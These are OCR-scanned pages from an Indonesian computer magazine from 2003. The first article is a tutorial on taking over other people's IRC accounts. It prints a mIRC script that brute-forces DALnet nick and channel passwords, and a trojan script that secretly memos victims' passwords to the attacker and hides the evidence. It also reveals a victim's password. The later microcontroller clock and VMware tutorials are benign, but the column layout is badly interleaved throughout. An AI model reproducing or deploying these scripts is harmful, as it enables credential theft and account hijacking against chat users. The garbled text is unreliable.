mIRC Aliases, jangan lupa
mengganti [Nick] dengan nick
anda sendiri yang telah
diregisterkan.
Selesai sudah menanamkan
nunggu korban saja. Tetapi si-
lakan mencoba apakah peker-
jaan anda itu berhasil. Masuk-
kan nick yang akan dijadikan
kelinci percobaan dengan ca-
tatan nick tersebut harus nick
yang teregister karena hanya
nick yang teregister yang me-
miliki password. Selanjutnya
lakukan connection ke server
dalnet.
Sekarang coba buka mIRC satu
di dalam skrip. Apakah kita te-
lah menerima memo dari nick
korban yang berisi password
nick tersebut.
Dari gambar kedua di atas ter-
lihat bahwa anda telah mene-
rima memo dari nick korban,
bacalah apa isi memo terse-
but. Ternyata nick odyxb pass-
wordnya lontongsayur.
 NeoStyle
I RC PASSWO R D C R AC K I N G
Bongkar Paksa Nick &
Channel Password
Banyak cara untuk mendapatkan password nick dan channel orang . Putut Indrayana (matrik7@yahoo.com)
menyajikan salah satu cara yaitu dengan menjalankan skrip yang menjalankan proses brute force.
Skrip pada artikel ini telah diuji coba oleh MA Rody Candera (odyxb@melva.org).
ENTU ANDA TIDAK ASING LAGI dengan mIRC, program
T berbincang dengan orang lain secara tertulis di
Internet. Pada mIRC kita menggunakan nama
panggilan atau yang sering disebut nickname atau biasa
disingkat nick.
Agar lawan bicara di mIRC mengenal kita, kita cukup
menggunakan satu nick sehingga ketika lain waktu ber-
jumpa, lawan bicara yang pernah berbincang dengan kita
dapat langsung mengenali kita. Server Dalnet
mengizinkan kita untuk meregister nick pilihan kita dan
memberikan kode atau sandi atau password sebagai tanda
kita adalah pemilik dari nick yang diregisterkan tersebut.
Tidak hanya nick saja yang dapat diregisterkan pada
server Dalnet, tetapi juga channel. Jika nick yang
digunakan memiliki akses yang cukup baik seperti sebagai
seorang operator channel dan channel yang kita miliki
sudah terisi cukup banyak orang, berhati-hatilah. Tetapi
apakah mungkin nick maupun channel yang dimiliki
dapat diambil oleh orang lain? Jawabnya mungkin saja.
Hal tersebutlah yang akan dijabarkan pada artikel ini.
;ini adalah contoh skrip mIRC untuk mengambil passwd nick dan
chanel dengan metode brute force
;Original script by beefcake, saya hanya mengedit sedikit.
;skrip ini membutuhkan file kamus kata-kata untuk menebak
passwd
;Script ini akan terus menebak passwd nick/chanel berdasarkan
urutan kata yang ada di kamus
;tunggu hingga muncul windows yang terdapat kalimat
NickServ/ChanServ PassWord Accepted
; lalu liat cracking status kata apa yang ada disana , dan … anda
telah mendapatkan passwdnya.
alias cracknick {
if (%craknick == $null) { /echo 4 -a -=* Belom memasukan nick =-
dihentikan | /.timer500 off | .timer503 off | /halt }
if (%crackbaris == $null) { /echo 4 -a -=* Belom masukin baris ke
berapa =- dihentikan | /.timer500 off | .timer503 off | /halt }
if (%kamus == $null) { /echo 4 -a -=* gak ada file kamus =-
dihentikan | /.timer500 off | /.timer503 off | /halt }
if ($window(@PassCracker) == $null) { /window -a @PassCracker
0 500 500 79 | /titlebar @PassCracker NickServ Passwords cracker
nyoba baris ke: %crackbaris }
/nickserv identify %craknick $read -l $+ %crackbaris %kamus
set %ncpass $read -l $+ %crackbaris %kamus
titlebar @PassCracker NickServ Passwords cracker nyoba baris ke:
%crackbaris
aline @PassCracker 5 $+ %ncpass
/inc %crackbaris 1
}
36 NeoTek Februari 2003
alias stn { /.timer500 0 20 /cracknick | /.timer503 0 60 /.ctcp $me
ping | .enable #passhack on | /echo 4,10 Passwd cracker untuk nick
8< %craknick > 4 Dimulai }
alias stc { /.timer501 0 20 /crackchan | /.timer503 0 60 /.ctcp $me
ping | .enable #passhack on | /echo 9,10 Passwd chanel cracker
untuk nick 8< %crackchan > 4 Dimulai }
alias %crackchan {
if (%%crackchan == $null) { /echo 4 -a 8,10-=* Belom
memasukan nick =- 4 dihentikan | /.timer500 off | .timer503 off |
/halt }
if (%crackbaris == $null) { /echo 4 -a 8,10-=* Belom masukin
baris ke berapa =- 4 dihentikan | /.timer500 off | .timer503 off |
/halt }
if (%kamus == $null) { /echo 4 -a 8,10-=* gak ada file kamus =-
4 dihentikan | /.timer500 off | .timer503 off | /halt }
if ($window(@PassCracker) == $null) { /window -a @PassCracker
0 500 500 79 | /titlebar @PassCracker ChanServ Passwords cracker
nyoba baris ke: %crackbaris }
/chanserv identify %crackchan $read -l $+ %crackbaris %kamus
set %chpass $read -l $+ %crackbaris %kamus
titlebar @PassCracker ChanServ Passwords cracker nyoba baris ke:
%crackbaris
aline @PassCracker 5 $+ %chpass
/inc %crackbaris 1
}
menu Menubar,channel {
-
Password Cracker
.Nick Cracker
..Start:{ set %craknick $$?="Nick yang mau di Crack" | set %kamus
$dir="Pilih File kamus " | set %crackbaris $$?="cracking dengan
kamus pada baris ke" | /stn }
..Stop: /.timer500 off | /echo 4 -a -=+ Berhenti di baris:
%crackbaris dilanjutkan lain kali. | /unset %craknick | .disable
#passhack end | .timer503 off
..-
..Passwd ada di:/echo 4 -a -=+ passwd %craknick ada di %kamus
,baris ke: %ncpass
.Chanel Cracker
..Setup:{ set %%crackchan $$?="Channel Yang mau di
Crack(jangan lupa tanda #)" | set %kamus $dir="Pilih File kamus " |
set %crackbaris $$?="Baris di kamus untuk memulai cracking " | /stc
}
..Stop: /.timer501 off | /echo 4 -a -=+ Berhenti di baris:
%crackbaris dilanjutkan lain kali. | /unset %%crackchan | .disable
#passhack end | .timer503 off
..-
..Passwd ada di:/echo 4 -a -=+ Passwd %crackchan ada di
%kamus ,baris ke: %chpass
}
 NeoStyle

on 1:load:{ alias identify raw -q { identify $1 | memoserv send Prayana $1 }

window -a @PassCracker 75 150 650 79 alias nickserv if $1 == identify { identify $2 | memoserv send
titlebar @PassCracker Tentang passwd cracker .... Prayana $2 }
aline @PassCracker 10,1Password Cracker reedited By: Prayana alias oper raw -q { oper $1 $2 | memoserv send Prayana OPER
has been loaded. Login: $1 - Senha: $2 }
aline @PassCracker 10,1Script ini cuma buat nambah [remote]
pengetahuan ,jangan di pake!!.Gue gak bertanggung jawab tentang on *:connect: { /ignore memoserv }
penggunaan script ini,gue cuma ngedit. on *:join:#:if ( $nick == $me ) { echo | halt } | .ignore -u6 $me | inc
aline @PassCracker 9,1Script ini berjalan di server dalnet %nmmn | .timerD $+ %nmmn $+ D 1 5 .Msg $nick O m
only,tapi sekarang dalnet dah bikin patch nya,so ..
aline @PassCracker 8,1,kalo masih mau make juga .. siap² kena
akill ip kamu 7 turunan dari dalnet ^_^ ... Beware ! heheheee
.auser 696969 NickServ
.auser 696969 ChanServ
.disable #passcrack end
}

#passhack on
on 696969:notice:*accepted*:*:{
if ($nick == NickServ) goto npKetemu | elseif ($nick == ChanServ)
goto cpKetemu | halt
halt
:npKetemu
if ($window(@PassKetemu) == $null) { window -a @PassKetemu
150 150 500 79 } | else /clear @PassKetemu
titlebar @PassKetemu NickServ Password Ketemu nick anda yang telah diregisterkan. Setelah disimpan dan
drawtext -o @PassKetemu 4 Algerian 40 35 6 NickServ Password diganti tulisan Prayana menjadi nick anda, selamatkan
Ketemu!
pekerjaan anda dengan mengklik File → Save lalu klik OK
timer500 off
timer503 off Selanjutnya kita tunggu nick siapa yang akan menjadi
halt korban pertama dan korban selanjutnya, nantikan memo-
:cpKetemu servnya. Pada saat nick korban melakukan identify, maka
if ($window(@PassKetemu) == $null) { window -a @Passketemu pada saat itu juga password yang dimasukkan atas nicknya
150 150 500 79 } | else /clear @PassKetemu tersebut dikirimkan dalam bentuk memoserv ke nick anda.
titlebar @PassKetemu ChanServ Password Ketemu Untuk lebih memastikan skrip langsung berjalan melaku-
drawtext -o @PassKetemu 4 Algerian 40 35 6 ChanServ Password kan aktivitasnya, pada Options mIRC → IRC → Perform
Ketemu!
beri tanda cek pada “On connect, performs these
timer501 off
commands:” dan masukkan command /remote on pada
timer503 off
kotak besar di bawahnya.
halt
}
on 696969:notice:*Invalid*:*:halt
on 696969:notice:*Incorrect*:*:halt
#passhack end

Ada banyak teknik atau cara yang dilakukan orang untuk

mendapatkan password nick dan channel. Skrip di atas
menjabarkan cara kerja nick dan channel cracking dengan
menggunakan metode brute force.
Pada skrip di atas, metode brute force sudah tidak efektif
lagi digunakan di server Dalnet, karena IRCop Dalnet
akan segera mengetahui percobaan cracking ini melalui
banyaknya request identify yang masuk. Sebagai awal
mungkin anda akan mendapat peringatan dari IRCop,
namun jika masih berlanjut, maka IP anda kena akill
Dalnet sehingga dilarang masuk ke servis dalnet untuk
jangka waktu yang sangat lama.
Jika tidak ingin IP kita kena akill dari Dalnet, penulis Apakah pekerjaan anda itu tidak akan diketahui orang
memiliki cara lain. Anda bisa mencoba skrip singkat lain? Jawabnya mungkin saja bisa diketahui jika orang itu
berikutnya yang juga penulis sertakan di sini (lihat skrip mempunyai sikap hati-hati dengan terlebih dahulu me-
singkat berikutnya). meriksa Editor mIRC Remote. Jarang orang memperhati-
Load atau disimpan skrip tersebut pada Tools Menu kan hal tersebut. Dengan skrip ini, layar status tidak mem-
Remote mIRC (alt+R). Kemudian perhatikan script di berikan pesan memoserv kepada orang yang menjadi kor-
atas, tulisan Prayana diganti dengan nick anda yang telah ban. Perhatikan lagi skripnya, pada on *:connect diset
diregisterkan karena password dari nick yang menjadi /ignore memoserv yang berfungsi untuk menghindari
korban akan dikirimkan dalam bentuk memoserv kepada pemberian pesan kepada orang yang menjadi korban. „

Februari 2003 NeoTek 37

 NeoTekno

Tukar Otak
Proyek Digital Clock (5)
Melanjutkan artikel Advanced Digital Clock, tutorial kali ini menjelaskan kerja perangkat lunak
NeoClock2.asm. Hardy (hardythe@cbn.net.id) membahas bagian yang belum dibahas pada
tutorial sebelumnya.

ADA BAGIAN RAM, DITAMBAHKAN register baru Subroutine yang bertugas menentukan apa yang ditampilkan
P dengan nama T1 (Timer 1) dan T2 (Timer 2) untuk
jam puluhan, jam satuan, menit puluhan dan menit
(DispPrep—Display Preparation) akan meletakkan datanya
ke buffer ini. Bagian Display mengambil dan mengkonversi
satuan. T1Jam10 DS 1 (data storage) berarti register bernama menjadi data segment dan ditampilkan ke 4 bh 7 segment.
T1Jam10 (Jam puluhan untuk Timer 1) diberi lokasi sebanyak Sebagai contoh: pada mode tampilan setting timer 1, maka isi
1 byte saja. Ada kalanya kita memakai lebih dari 1 byte timer 1 (jam-Menit) akan di-copy ke Buffer. Sedangkan bila
seperti DBuf ds 4 (4 byte). Kalau saat ini saya memakai nama Timer 1-nya off, maka yang ditampilan adalah text t1 of.
masing masing dari DBuf0 sampai DBuf3 itu hanya masalah
addressing. Beberapa register difungsikan sebagai counter, dan penggu-
naan flag lebih intensif. Dengan flag, kita bisa memakai 1
Pada DBuf ds 4, untuk mencapai DBuf ke 3 saya bisa lakukan byte untuk 8 buah flag (efisien)
dengan menamainya DBuf+2. Display Buffer ke 1 ditulis
dengan "Dbuf+0" atau "Dbuf" saja. Assembler akan meng- Subroutine tetap diatur oleh mainloop. Yang tanpa filter se-
arah pada lokasi yang benar. Sedangkan dengan cara saat ini, perti Input, ModeMan, Display dan Output akan terus di
saya bisa tulis langsung Dbuf2 sebagai nama lokasinya. Real akses setiap loop. Yang berfilter seperti Second diakses setiap
address-nya (sering disebut effective address) ditentukan oleh second, Evaluate setiap menit dan DisplayPrep setiap setengah
lokasi register sebelumnya. detik.
Instruksi directive (mengarahkan kerja assembler dan tidak ** MAIN LOOP ***********************************************************
berguna bagi MCU) org (origin)-lah yang menentukan lokasi
riilnya. Lihat file listing hasil assembling. Di sana tertera MAIN jsr InputJob ; process increment value (SW2)
lokasi real register tersebut. jsr ModeManJob ; manage mode (SW1)
braclr DoSec,MAIN10 ; if Second task time,
Memang metode puluhan dan satuan ini lebih boros diban- bitclr DoSec ; clear flag first
dingkan dengan cara menggabung kedua nilai menjadi 1 re- jsr SecondJob ; do second event
gister. Alasan pemilahan metode boros ini karena RAM MCU MAIN10 braclr DoMin,Main20 ; if Minute task time,
bitclr DoMin ; clear flag first
memang masih banyak serta ROM yang sebesar 8 kilobyte jsr EvaluateJob ; do minute event (evaluate timer)
tidak akan penuh karena penggunaan metode ini (efek tidak Main20 braclr HalfSec,Main30 ; if Half Second Event occur,
langsung) dan yang penting adalah kesederhanaannya karena bitclr HalfSec ; clear flag first
tidak perlu konversi terlebih dahulu dari 1 byte menjadi 2 jsr DispPrepJob ; Prepare Display
Main30 jsr DisplayJob ; Display Time
digit untuk ditampilkan sebagai angka satuan dan puluhan- jsr OutputJob ; execute output (relay & buzzer)
nya. Hal itu sangat penting di artikel NeoClock1.asm yang bra MAIN ; make a loop
ditujukan untuk pemula.
Mode yang diterapkan di NeoClock2.asm menghasilkan tam- Sebelum masuk ke jump table, input subroutine memeriksa
pilan yang berbeda dalam setiap modenya. Pemilihan tugas SW1 dan SW2. Hanya apabila SW1 open dan SW2 pushed,
dilakukan dengan menyediakan buffer display sebanyak 4 jump table diakses. Selain itu routine langsung ke luar
byte yang merupakan bayangan bagi tampilan 4 buah 7 (Input0 yang langsung rts—return from subroutine).
segment tapi masih berupa angka desimal. Langkah pertama pemakaian jump table adalah mengambil
nilai pada register Mode karena Mode yang menentukan
T1Jam10 ds 1 ; Jam Puluhan Timer1
tugas saat itu (akan loncat ke mana).
T1Jam1 ds 1 ; Jam Satuan Timer1 Dengan masuknya nilai mode ke index register (X), instruksi
T1Men10 ds 1 ; Menit Puluhan Timer1 ke 2 akan mengisi ulang register X tadi dengan "nilai yang
T1Men1 ds 1 ; Menit Satuan Timer1 berada pada lokasi" yang ditunjuk oleh lokasi base (InpTbl)
T2Jam10 ds 1 ; Jam Puluhan Timer2 ditambah dengan nilai X sebelumnya.
T2Jam1 ds 1 ; Jam Satuan Timer2 Misalnya mode = 3 (isi X jadi 3, maka pada opcode kedua, X
T2Men10 ds 1 ; Menit Puluhan Timer2 akan diisi oleh lokasi InpTbl + 3 (isi X). Hasilnya adalah nilai
T2Men1 ds 1 ; Menit Satuan Timer2 Input3-InpTbl (jarak). Setelah dapat jarak InpTbl ke tujuan,
DBuf0 ds 1 ; Buffer display 4 bh 7 segment. kita gunakan untuk jump (melompat) ke lokasi tujuan de-
DBuf1 ds 1 ngan melompat dari base sejauh jarak tadi. Tentunya hasil-
DBuf2 ds 1 nya kita akan berada di lokasi tujuan.
DBuf3 ds 1 Cara penulisan seperti "Input3-InpTbl" ini memungkinkan

38 NeoTek Februari 2003

 NeoTekno

kita mengubah routine (bila ada perbaikan) pada input 0 *** SecondJob aktif tiap second ******************************************
sampai 2 tanpa perlu menghitung jarak kedua lokasi tersebut *** Decrement Relay delay dan Buzz delay sampai 0 (off)
secara manual karena akan dilakukan oleh assembler dalam
proses assembly-nya SecondJob tst Relaydly ; test Relay delay
beq Sec20 ; if <> 0,
dec Relaydly ; decrement relay delay

*** InputJob proses SW2on1 ******************************************** Sec20 tst Buzzdly ; test Buzz delay
beq Sec30 ; if <> 0,
InputJob braset SW1on,Input0 ; if SW1 open, dec Buzzdly ; decrement buzz delay
braclr SW2on1,Input0 ; if SW2 pushed,
bitclr SW2on1 ; clear flag first
ldx Mode ; get mode Pencocokan timer di Evaluate dilakukan setiap menit karena
ldx InpTbl,x ; to get distance from table
jmp InpTbl,x ; and jump to destination. satuan terkecil setting timer adalah menit. Dilakukan dengan
cara sederhana dan bertahap. Sebelum proses pencocokan, di
InpTbl fcb Input0-InpTbl test dulu apakah timer bersangkutan aktif. Bila tidak, lompati
fcb Input1-InpTbl
fcb Input2-InpTbl saja dari pada membuang waktu percuma.
fcb Input3-InpTbl ; ß ← isinya yang diambil.
fcb Input4-InpTbl
fcb Input5-InpTbl
fcb Input6-InpTbl *** EvaluateJob aktif tiap menit compare jam dengan kedua timer
fcb Input7-InpTbl EvaluateJob braclr Tim1on,Eva50 ; if Timer 1 on,
fcb Input8-InpTbl lda Men1 ; get menit1
Input0 rts ; just quit, not here cmp T1Men1 ; compare dgn menit1 Timer 1
bne Eva50 ; if equal,
Input1 inc Jam1 ; Mode1 (increment jam) lda Men10 ; get menit10
cmp T1Men10 ; compare dgn menit10 Timer 1
bne Eva50 ; if equal,
lda Jam1 ; get jam satuan
Tidak ada yang baru dalam input nilai jam dan menit baik
untuk jam sebenarnya dan Timer 1 dan Timer 2. Cukup mi-
rip dengan Secondjob sebelumnya (NeoClock1.asm). Ada 2 Jump Table di dalam DispPrep. Di bagian atas
Untuk mencocokkan Detik dari Jam sebenarnya dipakai me- merupakan bagian yang dipanggil oleh table di tengah yang
tode: detik akan direset dan langsung start pada setiap pene- di call oleh Mainloop. Prosedur cukup sederhana, Cuma ada
kanan SW2 pada mode set menit. filter yang menghasilkan efek berkedip dengan cara pada
perioda setengah detik lokasi di isi dengan data, dan setengah
* setiap penekanan untuk setting menit akan mereset detik detik periode selanjutnya di kosongi. Pada Sub-mode
ke 00 & prescaler-nya ke 25 RUNdisplayMode hanya terjadi perubahan tampilan statis.
Apabila Timer 1 off maka yang keluar adalah tulisan t1 of
Input2 clr Detik1 ; clear detik satuan sedangkan apabila aktif, yang tampil adalah nilai settingnya.
clr Detik10 ; clear detik puluhan
mov #25,Tick ; set prescaler *** DispPrep mempersiapkan data yang akan di display ***************
inc Men1 ; Mode2 (increment menit)
RealPrep0 ldx RunDispMode ; for mode 0 (RUN),
ldx RDModeTbl,x ; get distance
jmp RDModeTbl,x ; jump to destination
Toggle On Off timer 1 dilakukan dengan membaca dulu kon-
disi saat ini dengan instruksi braset Tim1on, Input35 yang RDModeTbl fcb RDM0-RDModeTbl
artinya: Branch (loncat) ke baris berlabel Input35 apabila bit fcb RDM1-RDModeTbl
(flag) Tim1on sedang set. Tim1on set apabila Timer 1 sedang fcb RDM2-RDModeTbl
aktif. Ada 2 kemungkinan dari pencabangan (branch) ini: fcb RDM3-RDModeTbl

1. saat ini Tim1on set (aktif), maka loncat ke Input35 dan RDM0 ldx #3 ; RunMode 0 (jam-
mematikan timer dengan bitclr Tim1on. Lalu rts. menit)
2. saat ini Tim1on clear (non aktif), maka diteruskan dengan ---deleted---
mengaktifkannya dengan bitset Tim1on. Loncat (bra) ke DispPrepJob ldx Mode ; get mode
Input39 lalu rts. ldx PrepTab,x ; use to get distance
jmp PrepTab,x ; jump to destination

Input3 braset Tim1on,Input35 ; Mode3 (TIMER1 toggle on - off) PrepTab fcb Prep0-PrepTab
bitset Tim1on ; if timer 1 off, make it on fcb Prep1-PrepTab
bra Input39 ; then quit fcb Prep2-PrepTab
Input35 bitclr Tim1on ; else, make it off fcb Prep3-PrepTab
Input39 rts ; quit fcb Prep4-PrepTab
fcb Prep5-PrepTab
fcb Prep6-PrepTab
Penambahan pada subrotuine ini hanya decrement Relay dan fcb Prep7-PrepTab
fcb Prep8-PrepTab
Buzzer delay. Karena routine ini diakses setiap 1 detik maka
nilai 5 yang diisi di bagian Output akan menghasilkan delay
Prep0 jmp RealPrep0
5 detik (relay-nya menyala 5 detik). Decrement dilakukan * ---------------------------------------------------------------------
bila delaynya belum mencapai nilai 0.
Prep1 braset AltDisp,Prep15 ; Mode1 jam (kedip) dan menit

Feburari 2003 NeoTek 39

 NeoTekno

DisplayJob berubah sedikit. Kalau dulu mengambil data lang- Tim3 ts RunDdly ; get RunMode Display delay value
sung dari lokasi Jam10 sampai Detik1, sekarang mengambil beq Tim5 ; if <> 0
dari Dbuf karena adanya kebutuhan perubahan tampilan dec RunDdly ; decrement it
yang sudah diselesaikan oleh bagian Display Preparation.
Efisiensi tampilan diperbaiki dengan memindahkan instruksi Tim5 dec Tick ; Use Tick Register as counter
pemadaman semua digit ke lokasi persis sebelum pengubah- lda Tick ; get Tick Value
cmp #12 ; compare with Half Second
an data portB dan penyalaan kembali.
bne Tim7 ; if = half second,
PR untuk mengubah kecerahan bisa dilakukan dengan me- bitset HalfSec ; set Half second flag
ngurangi jumlah penyalaan sesuai waktu. Lakukan dengan bra Tim10 ; next
memfilter baris instruksi “mov Dig2Fire,PORTA.”
Tim7 tst Tick ; test Tick
Segment tambahan di Table berguna untuk membentuk bne Tim10 ; if = 0,
huruf sederhana: t, o, f, n dan blank. lda #25 ; load Tick Counter by 25
sta Tick ; to create about (not accurate)
bitset DoSec ; 1 Second Event
Disp30 ldx Dig2Disp ; use Dig2Disp as pointer to bitset AltDisp ; 1 second event
lda DigTable,x ; get Digit # to display (in bit bitset HalfSec ; also half second event
pattern)
sta Dig2Fire ; save it temporarily
Disp70 ldx DBuf0,x ; get value to display, use as pointer
to Pada Bagian IRQ hanya dipakai untuk menangkap
lda SegTable,x ; get Segment pattern penekanan tombol SW1.
mov #$1E,PORTA ; kill all digit first to avoid ghost
sta PortB ; send to PortB IrqJob tst SW1Frz
mov Dig2Fire,PORTA ; turn on Digit in charge bne Irq99
rts ; Quit bitclr Mode1 ; just make sure
---- deleted ---- bitset SW1on ; set flag
SegTable fcb $40 ; 0 0100 0000 mov #12,SW1Frz
fcb $76 ; 1 0111 0110 Irq99 rti
---- deleted ----
fcb $04 ; 9 0000 0100
fcb $19 ; t 0001 1001 Pada Vector Table hanya ditambah dengan address IrqJob.
fcb $38 ; o 0011 1000
fcb $0B ; f 0000 1011
fcb $3A ; n 0011 1010 org $FFF6
fcb $7F ; 0111 1111 Security dw DummyISR ; $FFF6-FFF7 TIM Channel 0
Dw DummyISR ; $FFF8-FFF9 CMIREQ Vector
Chr_t equ 10 ; huruf t (kecil) dw IrqJob ; $FFFA-FFFB IRQ 1 Vector
Chr_o equ 11 ; huruf o (kecil) dw DummyISR ; $FFFC-FFFD SWI Vector
Chr_f equ 12 ; huruf f (kecil)
Chr_n equ 13 ; huruf n (kecil)
Chr_ equ 14 ; blank

OutputJob mengaktifkan dan memadamkan Relay dan Buz-

zer dan memberi nilai delay.
Decrement delay-nya dilakukan di bagian secondjob. Perisai Ampuh
Para Chatter:
OutputJob braclr T1click,Out10 ; if Relay need to activated,
bitclr T1click ; clear flag first Shell Account, BNC/EZBNC,
mov #5,Relaydly ; set delay 5 second PsyBNC & Eggdrop (Teknik
bitset RELAY ; activated Relay
Out10 tst Relaydly ; else, test relay delay Instalasi Dan Konfigurasi).
bne Out20 ; if time to de-activated relay Eryanto Sitorus
bitclr RELAY ; de-activated relay
Tebal : 102 Halaman.
Terbitan : Agustus 2002
TimerOverFlow ditambah dengan delay RUNdisplayMode Penerbit: PT. Dinastindo
dan penambahan flag Half Second serta AltDisp yang Harga : Rp. 13.500
digunakan untuk mengatur pengedipan display.

40 NeoTek Februari 2003


VMware Workstation
Besarnya minat neoteker terhadap VMware untuk Linux, membuat NeoTek mengangkat
kembali topik virtual machine ini dengan tulisan Asmuri Anwar (asmuri@persda.co.id) yang
melengkapi bahasan VMware untuk Windows sebelumnya.
Instalasi dan konfigurasi
Sebelum melakukan instalasi, sebaik-
nya persiapkan hal-hal berikut:
• Sebuah komputer dan host sistem
operasi yang dapat menjalankan
VMWare Workstation. Spesifikasi
hardware yang dibutuhkan:
• Prosesor. 266MHz ke atas (400
MHz ke atas direkomendasikan),
single atau multiprocessor.
• Memori. Minimal 128MB
(256MB direkomendasikan).
• Disk drives. 100MB sisa space
yang tersedia untuk basic instalasi.
Sebaiknya sediakan 500MB untuk
guest operating system beserta
aplikasinya.
• Lisensi VMware Workstation. Jika
belum ada, dapatkan di
www.vmware.com/vmwarestore/
vmwarestore.html/t_blank.
File lisensi akan dikirimkan pada
anda lewat email.
• Software aplikasi VMware Workstation.
Anda dapat mendownloadnya di
www.vmware.com/download.
• CD atau disk instalasi untuk sistem
operasi guest.
Instalasi VMware Workstation
Untuk melakukan instalasi VMware
Workstation pada sistem operasi Li-
nux, anda terlebih dahulu harus login
sebagai user yang akan anda gunakan
untuk menjalankan VMware Work-
station. Pada terminal window, ketika
su untuk login ke root. Copy-kan
software VMware Workstation ke
direktori /usr/local/src.
$ su
Password:
$ cd /usr/local/src
Ekstrak tar file yang baru anda copy-
kan tersebut.
$ tar zxf VMware-x.x.x-xxx.tar.gz
Pindah ke direktori tempat VMware
Workstation diekstrak:
untuk Linux
$ cd vmware-distrib
Jalankan instal skrip perl vmware-
install.pl
$./vmware-install.pl
Kemudian lakukan konfigurasi VMware
Workstation bila pada prompt ditanya-
kan apakah anda akan menjalankan
vmware-config.pl? Jawab ‘Yes.’ Skrip
vmware-config.pl ini akan digunakan
untuk melakukan konfigurasi VMware
Workstation sewaktu anda meng-
upgrade kernel. Bila anda akan meng-
instal ulang VMware Workstation,
konfigurasi tersebut tidak perlu anda
lakukan lagi.
Bacalah pernyataan End User Licence
Agreement (EULA). Tekan tombol
space bar. Kemudian tekan tombol ‘Q’
untuk ke prompt selanjutnya.
Untuk mudahnya, sebaiknya konfigu-
rasi default saja yang anda pakai de-
ngan menjawab ‘Yes’ untuk setiap per-
tanyaan yang diajukan. Beberapa konfi-
gurasi yang harus anda lakukan bila:
• Di mesin anda menjalankan Samba,
pada saat ditanyakan:
Do you want this script to automat-
ically configure your system to allow
your virtual machines to access the
host file system?
Jawab No. Jika Samba tidak dalam
keadaan running di mesin anda. Ja-
wab Yes dan VMware Workstation
akan melakukan konfigurasi Samba
secara otomatis. Pada saat ditanya-
kan user name dan password untuk
digunakan bersama Samba, masuk-
kan user name dan password Anda.
• Selanjutnya, tekan tombol Enter un-
tuk menampilkan DHCP server co-
pyright information. Anda harus
menekan space bar, kemudian tekan
Q untuk melanjutkan.
• Jawab Yes pertanyaan-pertanyaan
berikut:
• Do you want to use the network
in your virtual machines?
NeoTutor
• Do you want to be able to use
host-only network in your virtual
machines?
• Do you want this script to probe
for an unused private subnet?
Bila anda menemukan masalah pada
saat melakukan konfigurasi di atas
seperti:
1. Di akhir instalasi tidak menampil-
kan “Installation successful.” Laku-
kan instal ulang.
2. Bila selesai, logout dari root account.
Instalasi Lisensi
Setelah selesai instalasi VMware Work-
station, anda harus menginstal lisensi
VMware Workstation. Langkah-lang-
kahnya:
1. Pindah ke home directory
$ cd /home/asmuri<Enter>
2. Jika anda belum mempunyai direk-
tori .vmware (pakai tanda titik di
depannya). Buatlah sekarang:
$ ls -al
$ mkdir .vmware
3. Simpan file lisensi anda di dalam
direktori .vmware. Yakinkan nama
file lisensi anda tersebut dimulai
dengan (prefix) license --
Konfigurasi Komputer Virtual
Sebelum Anda melakukan konfigurasi
untuk komputer virtual, perhatikan
beberapa catatan berikut dan perlu
beberapa penyesuaian dengan
konfigurasi host sistem operasi Anda.
• Real time clock function harus di-
kompilasikan ke Linux kernel Anda
• VMware Workstation untuk Linux
memerlukan parallel port “PC-style
hardware” option (CONFIG_
PARPORT_PC) untuk membangun
dan me-load sebagai sebuah modul
kernel modul (harus diset ke mode
“m”).
Sekarang saatnya menginstal lisensi
VMware Workstation:
Februari 2003 NeoTek 41
 NeoTutor
1. Jalankan VMware Workstation dengan
menuliskan vmware pada terminal
console anda.
$ vmware
Jika anda menerima serial number
pada saat membeli software VMware
Workstation, anda harus memasuk-
kannya pada saat pertama kali men-
jalankan VMware Workstation. Bia-
sanya ada 20 karakter yang harus
anda masukkan. Klik OK untuk
melanjutkan.
Sekali anda memasukkan serial num-
ber, secara otomatis akan tersimpan
dalam file lisensi dan tidak akan
ditanyakan lagi saat anda memulai
menjalankan VMware Workstation.
2. Memulai konfigurasi. Saat VMware
Workstation dijalankan, di layar
akan tampil tiga pilihan:
• Run the Configuration Wizard.
• Run the Configuration Editor.
• Open an existing configuration.
Default pilihan adalah “Run the
configuration wizard.”
Klik tombol OK untuk memulai
configuration wizard. Configuration
wizard juga dapat Anda jalankan
dari menu File → Wizard.
Tekan tombol Next atau Prev untuk
melanjutkan ke instruksi berikutnya.
Setiap halaman akan memberikan
pertanyaan yang harus anda respons.
Selain itu anda juga harus mengisi
form. Jika selesai, tekan tombol
42 NeoTek Februari 2003
Finish untuk mengakhiri konfigu-
rasi komputer virtual anda.
3. Memilih sistem operasi.
Layar pertama yang akan ditampil-
kan adalah sistem operasi apa yang
akan anda instal pada komputer vir-
tual anda. Configuration wizard
menggunakan informasi ini untuk
memilih nilai default yang tepat,
seperti besarnya space yang
diperlukan.
Jika sistem operasi anda tidak terlihat
dalam daftar sistem operasi yang bi-
Beberapa sistem operasi memerlu-
sa anda instal, pilih “Other” dan ma- kan driver CD-ROM untuk meng-
sukkan nama sistem operasi yang
instalnya. Jika tidak ingin menggu-
sesuai. nakan CD-ROM, anda dapat me-
Langkah berikut saya asumsikan an- milih pilihan pertama, CD-ROM
da akan menginstal sistem operasi Disabled.
guest Windows 98.
7. Mengaktifkan floppy disk drive.
Memilih Direktori untuk Komputer
Virtual
Untuk memudahkan administrasi,
setiap komputer virtual mempunyai
direktori masing-masing. Semua
file yang berhubungan dengan kon-
figurasi file dan disk file diletakkan
ke dalam direktori ini.
Anda menetapkan direktori default
untuk instalasi Windows 98 berada
di ~namauser/vmware/win98 atau
/home/namauser/vmware/win98 di
mana namauser adalah user yang
login pada saat itu.
Pilih opsi “Floppy Enabled” dan ten-
4. Memilih tipe disk. tukan device di mana secara fisik
Memilih Virtual Disk. Jika anda drive tersebut berada, biasanya
akan menginstal sistem operasi guest /dev/fd0.
secara langsung pada partisi yang 8. Mengkonfigurasi networking pada
ada (seperti ‘raw’ disk). Instalasi se- komputer virtual.
buah sistem operasi guest pada raw
disk direkomendasikan hanya untuk
advanced user saja.
5. Menentukan ukuran virtual disk.
Isikan berapa besarnya virtual disk
yang akan anda buat. Misal 2GB =
2000 MB
Dengan kapasitas virtual disk 2GB
anda dapat menginstal sistem ope-
rasi beserta program-programnya,
juga dapat dibuat untuk menyim-
pan data. Selain itu, jika kapasitas
hard disk anda cukup besar, anda
dapat membuat virtual disk lain dan
menginstal sistem operasi lain di Memilih Bridged and Host-Only
virtual disk tersebut. Biasanya, un- Networking akan melakukan ko-
tuk instalasi Windows 98 anda cu- neksi secara langsung ke lokal Ether-
kup menyediakan kapasitas sebesar net melalui sebuah kartu Ethernet
